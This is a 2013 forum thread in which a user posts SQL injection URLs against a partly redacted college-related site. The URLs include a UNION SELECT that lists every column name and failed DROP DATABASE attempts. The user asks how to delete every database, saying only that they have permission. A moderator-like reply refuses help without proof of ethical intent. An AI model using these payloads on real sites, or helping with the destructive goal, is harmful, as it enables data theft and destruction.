SQL Injection Hacking

Discuss the many weaknesses of browser security and ways to mitigate the threat

Post by skbly7 on Sat Mar 16, 2013 2:48 pm

Hello,
I am currently working on the SQL injection vulnerability of websites.


http://xyz(removed).com/events/events.php?event=74'

On opening it, I found that it is vulnerable to attacks.
Then:
http://xyz.com/events/events.php?event=74 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.columns where table_schema=database()--
I found the vulnerable number, which was 24, and so this URL was working and displaying all column names; similarly, I found all the database names too.
Now, what I have to do is delete all the databases from this.
What should I do?
Need help with this.

I have tried this:
http://xyz.com/events/events.php?event=74'; DROP DATABASE *;#
http://xyz.com/events/events.php?event=74'; DROP DATABASE 'testDB';#

(testDB is a database on the phpMyAdmin)
But it is not working.

NOTE: THE SITE I AM WORKING ON IS MY COLLEGE SENIOR'S, AND I HAVE TAKEN ALL PERMISSIONS TO DO SO.

Thanks in advance.
skbly7


Re: SQL Injection Hacking

Post by -Ninjex- on Sat Mar 16, 2013 3:45 pm

Malicious activity is not accepted here.

You will not get any help, unless you can prove that it is on ethical terms.

I understand you said it is for your college, but we don't just take people at their word.

IBTL;
Spreading knowledge just once a day, can help keep the script kiddies away ⠠⠵
no_hope if world.map{|person, ic = 0| ic +=1 if ignorance.include?(person)}.compact.length > (world.length / 2)
The absence of evidence is not evidence of absence.
-Ninjex-


